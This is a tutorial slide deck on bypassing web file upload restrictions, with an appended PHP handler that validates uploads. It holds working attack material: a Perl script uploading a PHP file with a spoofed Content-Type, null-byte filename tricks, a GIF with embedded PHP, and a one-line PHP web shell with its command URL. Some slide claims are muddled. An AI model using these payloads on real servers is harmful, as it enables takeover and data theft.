Bypass file upload restrictions
1. BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES AND SECURITY MEASURES
By K. Subramanian and K. R. Mukesh
2. File upload
• Necessity
• Social networking websites, blogs, file sharing, etc.
• Web developers often do not consider the threats
• Uploaded files should be sanitized
• If they are not, the result is local file inclusion and a compromised site
• Filtering mechanisms
4. Content-Type verification
• HTTP POST – MIME type
Content-Disposition: form-data; name="uploaded file []"; filename="18.jpg"\r\n
Content-Type: image/jpeg\r\n\r\n<file content>
• To bypass this filter, edit the Content-Type to an applicable one.
#!/usr/bin/perl
# Multipart POST of sh.PHP with a spoofed part-level Content-Type header
use strict;
use warnings;
use LWP;
use HTTP::Request::Common;

my $ua  = LWP::UserAgent->new;
my $res = $ua->request(POST 'http://example.com/upload.PHP',
    Content_Type => 'form-data',
    Content      => [
        # [ local file, filename sent to the server, extra part headers ]
        userfile => [ "sh.PHP", "sh.PHP", "Content-Type" => "application/pdf" ],
    ],
);
print $res->as_string();
5. An easy way – Tamper Data
• Tamper Data, a Mozilla Firefox add-on, allows modifying the POST data before it is submitted
6. Filename extension verification
• Check the extension of the file
• Filter out malicious extensions (blacklist)
$blacklist = array(".php", ".phtml", ".php3", ".php4");
• To bypass this, use NULL BYTES in the filename
sh.php%00.pdf
(or)
sh.asp;xx.pdf
• While uploading, the extension seen by the filter is .pdf
• When accessed, the file is delivered to the PHP interpreter
7. File content verification
• Applicable to image files
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
• To bypass this, manually craft an image file with embedded PHP code
Content-Type: image/gif
GIF89a(...some binary data...)<?php system($_GET['command']); ?>(...binary data...)
• The PHP interpreter executes the PHP code embedded among the garbage binary bytes
10. Worst case scenario
• Local file inclusion – PHP shell upload
• Simple PHP shell:
<?php system($_GET['command']); ?>
• Executes commands on the remote server
www.example.com/uploads/sh.php?command='ifconfig'
• Entire control of the server – rooting it
• Defacements, database access, credential theft, etc.
11. Security Measures
• Prevent direct access to the uploaded files
$uploaddir = '/var/spool/uploads/'; # outside the web root
• Block web access using an .htaccess file
IndexIgnore */*
• Overhead to read and write
• Sometimes leads to potential directory traversal attacks
12. Random file name implementation
• Prevents the attacker from knowing the name of the uploaded file
• Map the names in the database
$res = $db->query("INSERT INTO uploads SET name=?, original_name=?");
• Query while reading
• A little overhead, but secure
• Think again: leads to SQL injection
13. Conclusion
• Complicated to implement a secure file upload facility
• Many filters = slow response, which leads to Denial of Service (DoS) attacks
• Best way is to maintain UPLOAD LOGS containing user info such as IP address, helpful for tracing an attacker
• Secure coding practices
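A handler that combines the measures of slides 11 and 12 with the upload-log advice of the conclusion, written as an added PHP example that is not the presenters' code. It assumes a PDO connection $db, an uploads table with columns name, original_name and uploader_ip (the last column is an assumption), and that files are served back only through a separate download script that looks the random name up in that table.

```php
<?php
// Added example, not from the slides. Assumes a PDO connection $db and an upload
// directory outside the web root; a separate download script maps name -> file.
declare(strict_types=1);
const UPLOAD_DIR = '/var/spool/uploads/';   // outside DocumentRoot (slide 11)
const MAX_BYTES  = 2 * 1024 * 1024;         // 2 MiB cap
// Allow-list: each permitted extension mapped to the MIME type the bytes must have.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png', 'gif' => 'image/gif'];
function validate_upload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    $orig = (string) $file['name'];
    // Control bytes (a %00 arrives as "\0") or path separators: reject outright.
    if ($orig === '' || preg_match('/[\x00-\x1f\/\\\\]/', $orig)) {
        throw new RuntimeException('bad filename');
    }
    // Allow-list the last extension; a blacklist misses .phtml, .php5 and similar.
    $ext = strtolower(pathinfo($orig, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Trust the bytes, not the client's Content-Type: finfo and getimagesize() must agree with
    // the extension. A GIF with PHP appended still passes, so files must never reach the interpreter.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $info = @getimagesize($file['tmp_name']);
    if ($mime !== ALLOWED[$ext] || $info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('content does not match extension');
    }
    return $ext;
}
function store_upload(PDO $db, array $file): string
{
    $ext  = validate_upload($file);
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // unguessable name (slide 12)
    $dest = UPLOAD_DIR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest) || !chmod($dest, 0640)) {
        throw new RuntimeException('could not store file');
    }
    // Prepared statement: name, original name and uploader IP are bound parameters,
    // never SQL text (no injection), and the row doubles as the upload log.
    $stmt = $db->prepare('INSERT INTO uploads (name, original_name, uploader_ip) VALUES (?, ?, ?)');
    $stmt->execute([$name, $file['name'], $_SERVER['REMOTE_ADDR'] ?? '']);
    return $name;
}
```

Note that the IndexIgnore directive from slide 11 only hides entries from Apache directory listings; keeping the directory outside the DocumentRoot, as above, is what actually prevents direct requests for the stored files.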